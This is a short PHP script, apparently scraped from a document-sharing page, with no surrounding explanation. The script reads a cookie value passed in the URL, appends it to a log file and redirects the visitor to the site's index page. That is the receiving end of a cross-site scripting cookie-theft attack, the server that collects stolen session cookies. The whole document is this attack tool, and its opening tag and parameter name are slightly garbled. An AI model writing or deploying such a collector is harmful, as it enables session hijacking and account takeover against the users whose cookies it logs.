You are on page 1of 1

<?

php
$cookie = $HTTP_GET_VARS[" c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='/index.php';</script>";
?>

You might also like